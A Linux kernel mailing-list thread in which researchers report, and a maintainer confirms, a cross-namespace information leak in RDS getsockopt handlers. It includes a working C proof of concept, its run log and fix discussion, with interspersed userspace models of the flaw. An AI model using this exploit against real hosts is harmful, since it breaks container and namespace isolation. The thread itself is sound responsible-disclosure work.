* rds: possible cross netns leak via RDS_INFO_* getsockopt
@ 2026-05-05 8:37 Xie Maoyi
2026-05-05 22:07 ` Allison Henderson
0 siblings, 1 reply; 3+ messages in thread
From: Xie Maoyi @ 2026-05-05 8:37 UTC (permalink / raw)
To: achender@kernel.org
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
[-- Attachment #1: Type: text/plain, Size: 2600 bytes --]
Hi all,
We are not sure whether what we observed is a real bug or
intended behaviour. We would appreciate your view.
In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
registered in rds_info_funcs[]. Each handler reads a global list
that is not pernet:
    rds_sock_info / rds6_sock_info       -> rds_sock_list
    rds_tcp_tc_info / rds6_tcp_tc_info   -> rds_tcp_tc_list
    rds_conn_info / rds6_conn_info       -> rds_conn_hash[]
None of those filter by the caller's netns. rds_info_getsockopt()
also has no netns or capable() check. rds_create() has no
capable() check either. So AF_RDS is reachable from an
unprivileged user namespace.
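The pattern described above can be modelled in plain userspace C. This is only a sketch, not kernel code: struct entry, ns_id and dump_all() are hypothetical names standing in for an item on a global list such as rds_sock_list, the netns that owns it, and an info handler that never consults the caller's netns.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for one item on a global list (e.g. rds_sock_list). */
struct entry {
    int ns_id;           /* models the netns that owns the entry */
    unsigned short port; /* models a bound port */
};

/*
 * Models an info handler with no netns check: caller_ns is accepted but
 * never consulted, so every entry is copied out.
 * Returns the number of entries written to out (at most cap).
 */
size_t dump_all(const struct entry *list, size_t n, int caller_ns,
                struct entry *out, size_t cap)
{
    size_t copied = 0;

    assert(out != NULL || cap == 0);
    (void)caller_ns; /* deliberately unused: this is the missing filter */
    for (size_t i = 0; i < n && copied < cap; i++)
        out[copied++] = list[i];
    return copied;
}
```

In this model a caller whose namespace id is 2 still receives the entry owned by namespace 1, which mirrors what the attacker side of the PoC observes.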
Our reading is that an unprivileged caller in a fresh user_ns
plus netns can read RDS state from init_net. We see this in
practice on the latest net tree.
The fields that come back include:
    RDS_INFO_SOCKETS:      bound addr, port, sock inode of every
                           RDS socket on the host
    RDS_INFO_TCP_SOCKETS:  peer addr, port, last_sent_nxt,
                           last_expected_una, last_seen_una of
                           every rds-tcp connection on the host
    RDS_INFO_CONNECTIONS:  peer addr, port, cp_next_tx_seq,
                           cp_next_rx_seq of every RDS connection
A small reproducer is attached as poc_rds_info.c. With rds and
rds_tcp loaded, the steps are:
    modprobe rds
    modprobe rds_tcp
    ./poc_rds_info
The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
root. It then enters a fresh user_ns plus netns and opens AF_RDS
there. The attacker side reads RDS_INFO_SOCKETS and sees the
init_net socket. A run log is attached as poc_verification.log.
We are not sure if this counts as a bug or is by design. The
RDS_INFO_* interface looks diagnostic. It may be expected to be
host wide. On the other hand, AF_RDS is reachable from an
unprivileged user namespace, which is what surprised us.
Could you let us know whether you consider this worth fixing? If
yes, we have a draft patch that gates rds_info_getsockopt() to
init_net. We can send it once you confirm the direction.
Thanks for your time.
Maoyi Xie and Praveen Kakkolangara
Maoyi Xie
Nanyang Technological University
https://maoyixie.com/
________________________________
CONFIDENTIALITY: This email is intended solely for the person(s) named and may be confidential and/or privileged. If you are not the intended recipient, please delete it, notify us and do not copy, use, or disclose its contents.
Towards a sustainable earth: Print only when necessary. Thank you.
[-- Attachment #2: poc_verification.log --]
[-- Type: application/octet-stream, Size: 1183 bytes --]
[victim] AF_RDS bound 127.0.0.1:4242 in init_net (root)
[init-probe] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[init-probe] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
[0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
*** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[init-probe] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[init-probe] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[attacker] in netns=net:[4026532260] uid=0
[attacker] AF_RDS opened in fresh netns -> fd=4
[attacker] count-probe(SOCKETS) rc=-1 errno=28 optlen-after=56
[attacker] getsockopt(SOCKETS) rc=28 (each=28) len=28 -> 1 entries
[0] bound=127.0.0.1:4242 inum=3913 sndbuf=106496 rcvbuf=106496
*** LEAK: this is the victim's init_net socket (127.0.0.1:4242) — visible from attacker's fresh netns ***
[attacker] count-probe(TCP_SOCKETS) rc=41 errno=28 optlen-after=0
[attacker] getsockopt(TCP_SOCKETS) rc=41 (each=41) len=0 -> 0 entries
[attacker] count-probe(CONNECTIONS) rc=42 errno=28 optlen-after=0
[attacker] getsockopt(COUNTERS) rc=40 (each=40) len=1680 -> 42 entries
[-- Attachment #3: poc_rds_info.c --]
[-- Type: text/plain, Size: 5895 bytes --]
/* PoC v2: RDS RDS_INFO_* cross-netns getsockopt leak.
 * Build: gcc poc_rds_info.c -o poc_rds_info
 * Run as root in init_net.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>   /* uint16_t, uint32_t, uint64_t used below */
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>

#ifndef AF_RDS
#define AF_RDS 21
#endif
#ifndef SOL_RDS
#define SOL_RDS 276
#endif

#define RDS_INFO_COUNTERS          10000
#define RDS_INFO_CONNECTIONS       10001
#define RDS_INFO_SEND_MESSAGES     10003
#define RDS_INFO_RETRANS_MESSAGES  10004
#define RDS_INFO_RECV_MESSAGES     10005
#define RDS_INFO_SOCKETS           10006
#define RDS_INFO_TCP_SOCKETS       10007
#define RDS6_INFO_CONNECTIONS      10011
#define RDS6_INFO_SOCKETS          10015
#define RDS6_INFO_TCP_SOCKETS      10016

/* One RDS_INFO_SOCKETS record as returned by the kernel (28 bytes). */
struct rds_info_socket {
    uint32_t sndbuf;
    uint32_t bound_addr;
    uint32_t connected_addr;
    uint16_t bound_port;
    uint16_t connected_port;
    uint32_t rcvbuf;
    uint64_t inum;
} __attribute__((packed));

#define VICTIM_PORT 4242

/* Map an RDS_INFO_* option number to a short name for log output. */
static const char *opt_name(int o)
{
    switch (o) {
    case RDS_INFO_COUNTERS:         return "COUNTERS";
    case RDS_INFO_CONNECTIONS:      return "CONNECTIONS";
    case RDS_INFO_SEND_MESSAGES:    return "SEND_MSG";
    case RDS_INFO_RETRANS_MESSAGES: return "RETRANS_MSG";
    case RDS_INFO_RECV_MESSAGES:    return "RECV_MSG";
    case RDS_INFO_SOCKETS:          return "SOCKETS";
    case RDS_INFO_TCP_SOCKETS:      return "TCP_SOCKETS";
    case RDS6_INFO_CONNECTIONS:     return "6_CONNECTIONS";
    case RDS6_INFO_SOCKETS:         return "6_SOCKETS";
    case RDS6_INFO_TCP_SOCKETS:     return "6_TCP_SOCKETS";
    }
    return "?";
}

/* Fetch one RDS_INFO_* table and, for RDS_INFO_SOCKETS, print each entry. */
static void probe_one(int s, int opt, const char *who)
{
    char buf[8192];
    socklen_t len = sizeof(buf);
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);

    if (rc < 0) {
        fprintf(stderr, "[%s] getsockopt(%s) rc=%d errno=%d (%s)\n",
                who, opt_name(opt), rc, errno, strerror(errno));
        return;
    }

    /* On success rc is the per-entry size and len the total bytes copied. */
    int each = rc;
    int nentries = each ? (int)len / each : 0;
    fprintf(stderr, "[%s] getsockopt(%s) rc=%d (each=%d) len=%u -> %d entries\n",
            who, opt_name(opt), rc, each, (unsigned)len, nentries);

    if (opt == RDS_INFO_SOCKETS && nentries > 0) {
        struct rds_info_socket *si = (void *)buf;
        for (int i = 0; i < nentries; i++) {
            char b[32];
            inet_ntop(AF_INET, &si[i].bound_addr, b, sizeof(b));
            fprintf(stderr, " [%d] bound=%s:%u inum=%llu sndbuf=%u rcvbuf=%u\n",
                    i, b, ntohs(si[i].bound_port),
                    (unsigned long long)si[i].inum,
                    si[i].sndbuf, si[i].rcvbuf);
            if (si[i].bound_addr == htonl(0x7f000001) &&
                ntohs(si[i].bound_port) == VICTIM_PORT) {
                fprintf(stderr,
                        " *** LEAK: this is the victim's init_net socket "
                        "(127.0.0.1:%u) — visible from attacker's fresh netns ***\n",
                        VICTIM_PORT);
            }
        }
    }
}

static void probe_count(int s, int opt, const char *who)
{
    /* len=0 -> kernel returns -ENOSPC + total in optlen, exposing count */
    char buf[1];
    socklen_t len = 0;
    int rc = getsockopt(s, SOL_RDS, opt, buf, &len);

    fprintf(stderr, "[%s] count-probe(%s) rc=%d errno=%d optlen-after=%u\n",
            who, opt_name(opt), rc, errno, (unsigned)len);
}

int main(void)
{
    /* Step 1: Victim socket in init_net. */
    int v = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (v < 0) {
        perror("victim socket(AF_RDS)");
        return 2;
    }
    struct sockaddr_in vsin = {
        .sin_family = AF_INET,
        .sin_port = htons(VICTIM_PORT),
    };
    inet_pton(AF_INET, "127.0.0.1", &vsin.sin_addr);
    if (bind(v, (struct sockaddr *)&vsin, sizeof(vsin)) < 0) {
        perror("victim bind");
        return 2;
    }
    fprintf(stderr, "[victim] AF_RDS bound 127.0.0.1:%d in init_net (root)\n",
            VICTIM_PORT);

    /* Step 1b: probe from init_net to confirm rds_info works at all */
    int probe = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (probe >= 0) {
        probe_count(probe, RDS_INFO_SOCKETS, "init-probe");
        probe_one(probe, RDS_INFO_SOCKETS, "init-probe");
        probe_count(probe, RDS_INFO_TCP_SOCKETS, "init-probe");
        probe_one(probe, RDS_INFO_COUNTERS, "init-probe");
        close(probe);
    }

    /* Step 2: fork attacker into fresh user_ns + netns. */
    int pipefd[2];
    if (pipe(pipefd) < 0) {
        perror("pipe");
        return 2;
    }
    pid_t pid = fork();
    if (pid == 0) {
        close(pipefd[0]);
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("unshare");
            _exit(2);
        }

        /* Map uid/gid 0 in the new user_ns to uid/gid 0 outside. */
        int fd;
        char b[64];
        int n;
        if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
            write(fd, "deny", 4);
            close(fd);
        }
        fd = open("/proc/self/uid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n");
        write(fd, b, n);
        close(fd);
        fd = open("/proc/self/gid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n");
        write(fd, b, n);
        close(fd);

        /* Initialised so the log line is well defined if readlink() fails. */
        char nsa[64] = "?";
        int rl = readlink("/proc/self/ns/net", nsa, 63);
        if (rl > 0)
            nsa[rl] = 0;
        fprintf(stderr, "[attacker] in netns=%s uid=%u\n", nsa, getuid());

        int a = socket(AF_RDS, SOCK_SEQPACKET, 0);
        if (a < 0) {
            perror("[attacker] socket(AF_RDS)");
            _exit(2);
        }
        fprintf(stderr, "[attacker] AF_RDS opened in fresh netns -> fd=%d\n", a);
        probe_count(a, RDS_INFO_SOCKETS, "attacker");
        probe_one(a, RDS_INFO_SOCKETS, "attacker");
        probe_count(a, RDS_INFO_TCP_SOCKETS, "attacker");
        probe_one(a, RDS_INFO_TCP_SOCKETS, "attacker");
        probe_count(a, RDS_INFO_CONNECTIONS, "attacker");
        probe_one(a, RDS_INFO_COUNTERS, "attacker");
        close(a);
        write(pipefd[1], "x", 1);
        _exit(0);
    }

    /* Parent: wait for the attacker child before closing the victim socket. */
    close(pipefd[1]);
    char tmp;
    read(pipefd[0], &tmp, 1);
    int status;
    waitpid(pid, &status, 0);
    close(v);
    return 0;
}
* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
2026-05-05 8:37 rds: possible cross netns leak via RDS_INFO_* getsockopt Xie Maoyi
@ 2026-05-05 22:07 ` Allison Henderson
2026-05-06 7:10 ` Xie Maoyi
0 siblings, 1 reply; 3+ messages in thread
From: Allison Henderson @ 2026-05-05 22:07 UTC (permalink / raw)
To: Xie Maoyi
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
On Tue, 2026-05-05 at 08:37 +0000, Xie Maoyi wrote:
> Hi all,
>
> We are not sure whether what we observed is a real bug or
> intended behaviour. We would appreciate your view.
>
> In net/rds/info.c, rds_info_getsockopt() dispatches to handlers
> registered in rds_info_funcs[]. Each handler reads a global list
> that is not pernet:
>
> rds_sock_info / rds6_sock_info -> rds_sock_list
> rds_tcp_tc_info / rds6_tcp_tc_info -> rds_tcp_tc_list
> rds_conn_info / rds6_conn_info -> rds_conn_hash[]
>
> None of those filter by the caller's netns. rds_info_getsockopt()
> also has no netns or capable() check. rds_create() has no
> capable() check either. So AF_RDS is reachable from an
> unprivileged user namespace.
>
> Our reading is that an unprivileged caller in a fresh user_ns
> plus netns can read RDS state from init_net. We see this in
> practice on the latest net tree.
>
> The fields that come back include:
>
> RDS_INFO_SOCKETS: bound addr, port, sock inode of every
> RDS socket on the host
> RDS_INFO_TCP_SOCKETS: peer addr, port, last_sent_nxt,
> last_expected_una, last_seen_una of
> every rds-tcp connection on the host
> RDS_INFO_CONNECTIONS: peer addr, port, cp_next_tx_seq,
> cp_next_rx_seq of every RDS connection
>
> A small reproducer is attached as poc_rds_info.c. With rds and
> rds_tcp loaded, the steps are:
>
> modprobe rds
> modprobe rds_tcp
> ./poc_rds_info
>
> The PoC binds an AF_RDS socket in init_net to 127.0.0.1:4242 as
> root. It then enters a fresh user_ns plus netns and opens AF_RDS
> there. The attacker side reads RDS_INFO_SOCKETS and sees the
> init_net socket. A run log is attached as poc_verification.log.
>
> We are not sure if this counts as a bug or is by design. The
> RDS_INFO_* interface looks diagnostic. It may be expected to be
> host wide. On the other hand, AF_RDS is reachable from an
> unprivileged user namespace, which is what surprised us.
>
> Could you let us know whether you consider this worth fixing? If
> yes, we have a draft patch that gates rds_info_getsockopt() to
> init_net. We can send it once you confirm the direction.
>
> Thanks for your time.
>
> Maoyi Xie and Praveen Kakkolangara
>
> Maoyi Xie
> Nanyang Technological University
> https://maoyixie.com/
Hi Xie,
Thanks for looking into this. I think your findings are valid:
diagnostic or debug tools shouldn't give callers visibility into
another netns. Note, though, that while the ib transport is limited
to init_net, the tcp transport is not (see rds_set_transport()). So a
single gate in rds_info_getsockopt() would incorrectly hide entries
from callers in other netns that have legitimate tcp connections
there. The fix would instead need a filter in each of the three
handlers you've identified, comparing the netns of the requesting
socket to the netns of the entry (or c_net for connection paths), and
copying info only for matching entries instead of every entry in the
respective global list/hash.
Allison
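
The difference between a single init_net gate and a per-entry comparison can be illustrated with a small userspace model. This is a sketch under stated assumptions, not the kernel change itself: namespaces are modelled as plain integers, INIT_NS is a hypothetical id standing in for init_net, and seen_with_gate() / seen_with_filter() are illustrative names that do not exist in net/rds.

```c
#include <assert.h>
#include <stddef.h>

#define INIT_NS 0 /* hypothetical id standing in for init_net */

/* Entries a caller sees when the only check is a gate on init_net. */
size_t seen_with_gate(const int *entry_ns, size_t n, int caller_ns)
{
    assert(entry_ns != NULL || n == 0);
    /* The gate never inspects the entries: all of them or none. */
    return caller_ns == INIT_NS ? n : 0;
}

/* Entries a caller sees when each entry's netns is compared to its own. */
size_t seen_with_filter(const int *entry_ns, size_t n, int caller_ns)
{
    size_t seen = 0;

    assert(entry_ns != NULL || n == 0);
    for (size_t i = 0; i < n; i++)
        if (entry_ns[i] == caller_ns)
            seen++;
    return seen;
}
```

With two entries owned by namespace 0 and one owned by namespace 2, the gate shows a caller in namespace 2 nothing, including its own entry, and still shows a caller in namespace 0 all three. The per-entry comparison shows each caller only the entries from its own namespace.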
* Re: rds: possible cross netns leak via RDS_INFO_* getsockopt
2026-05-05 22:07 ` Allison Henderson
@ 2026-05-06 7:10 ` Xie Maoyi
0 siblings, 0 replies; 3+ messages in thread
From: Xie Maoyi @ 2026-05-06 7:10 UTC (permalink / raw)
To: Allison Henderson
Cc: netdev@vger.kernel.org, linux-rdma@vger.kernel.org,
rds-devel@oss.oracle.com
Hi Allison,
Thanks for confirming the direction.
We will rewrite the patch as a per entry netns filter in each
of the affected handlers, instead of the init_net gate in
rds_info_getsockopt() that we mentioned. Concretely:
  rds_sock_info / rds6_sock_info: skip rds_sock_list entries
    whose socket netns does not match the caller's netns.
  rds_tcp_tc_info / rds6_tcp_tc_info: skip rds_tcp_tc_list
    entries the same way.
  rds_conn_info / rds6_conn_info and the *_message_info_*
    variants: skip rds_conn_hash[] entries whose c_net does
    not match the caller's netns.
This preserves the rds-tcp behaviour where a caller outside
init_net with legitimate connections in their own netns can
still see them.
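
One detail of the plan above can be sketched in userspace C: since a zero-length probe reports the total entry count, the count itself should also be computed from matching entries only. The model below is an assumption-laden illustration, not the patch: struct info_entry, ns_id and filtered_info() are hypothetical names, and the real handlers report sizes through their own length bookkeeping rather than a `needed` out-parameter.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for one reported socket or connection. */
struct info_entry {
    int ns_id;          /* models the netns owning the entry */
    unsigned int value; /* models the reported payload */
};

/*
 * Models a filtered info handler. *needed always reports the number of
 * entries owned by caller_ns, so a size probe reveals nothing about
 * entries in other namespaces. Entries are written to out only when
 * out_cap can hold all matches. Returns the number of entries written.
 */
size_t filtered_info(const struct info_entry *list, size_t n, int caller_ns,
                     struct info_entry *out, size_t out_cap, size_t *needed)
{
    size_t match = 0, copied = 0;

    assert(needed != NULL);
    for (size_t i = 0; i < n; i++)
        if (list[i].ns_id == caller_ns)
            match++;
    *needed = match;
    if (match > out_cap)
        return 0; /* caller must retry with a larger buffer */
    for (size_t i = 0; i < n; i++)
        if (list[i].ns_id == caller_ns)
            out[copied++] = list[i];
    return copied;
}
```

A caller would first call with out_cap set to 0 to learn `needed`, then call again with a buffer of that size, which matches the probe-then-read sequence the PoC uses.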
We will send the patch as a separate reply once it is ready
and verified against the same PoC.
Thanks,
Maoyi Xie and Praveen Kakkolangara
Maoyi Xie
Nanyang Technological University
https://maoyixie.com/